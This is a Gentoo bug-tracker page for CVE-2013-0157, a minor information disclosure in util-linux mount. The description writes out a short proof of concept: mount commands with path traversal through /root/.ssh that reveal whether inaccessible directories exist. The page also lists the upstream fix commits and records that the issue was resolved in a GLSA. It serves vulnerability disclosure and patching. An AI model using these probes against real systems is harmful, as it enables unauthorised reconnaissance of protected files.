Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 450740 (CVE-2013-0157) - <sys-apps/util-linux-2.22.2: mount folder existence information disclosure (CVE-2013-0157)
Summary: <sys-apps/util-linux-2.22.2: mount folder existence information disclosure (C...
Alias: CVE-2013-0157
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
Whiteboard: A4 [glsa]
Depends on: 458226
  Show dependency tree
Reported: 2013-01-07 19:17 UTC by Agostino Sarubbo
Modified: 2014-05-18 11:50 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2013-01-07 19:17:09 UTC
From $URL :

This was originally reported by Jann Horn (

mount discloses information about folders not accessible for a user:

$ ls -ld /root/.ssh
ls: cannot access /root/.ssh: Permission denied
$ ls -ld /root/.foo
ls: cannot access /root/.foo: Permission denied

First variant:

$ mount --guess-fstype /root/.ssh/../../dev/sda1
$ mount --guess-fstype /root/.foo/../../dev/sda1

Second one:

$ mount /root/.ssh/../../dev/cdrom
mount: no medium found on /dev/sr0
$ mount /root/.foo/../../dev/cdrom
mount: can't find /root/.foo/../../dev/cdrom in /etc/fstab or /etc/mtab

These issues were, as far as I can see, fixed in the following upstream commits:
 - 0377ef91270d06592a0d4dd009c29e7b1ff9c9b8
 - 33c5fd0c5a774458470c86f9d318d8c48a9c9ccb
 - 5ebbc3865d1e53ef42e5f121c41faab23dd59075
 - cc8cc8f32c863f3ae6a8a88e97b47bcd6a21825f

External references:
Comment 1 Tobias Heinlein (RETIRED) gentoo-dev 2013-03-24 19:53:22 UTC
Added to existing GLSA request.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2014-05-18 11:50:06 UTC
This issue was resolved and addressed in
 GLSA 201405-15 at
by GLSA coordinator Sean Amoss (ackle).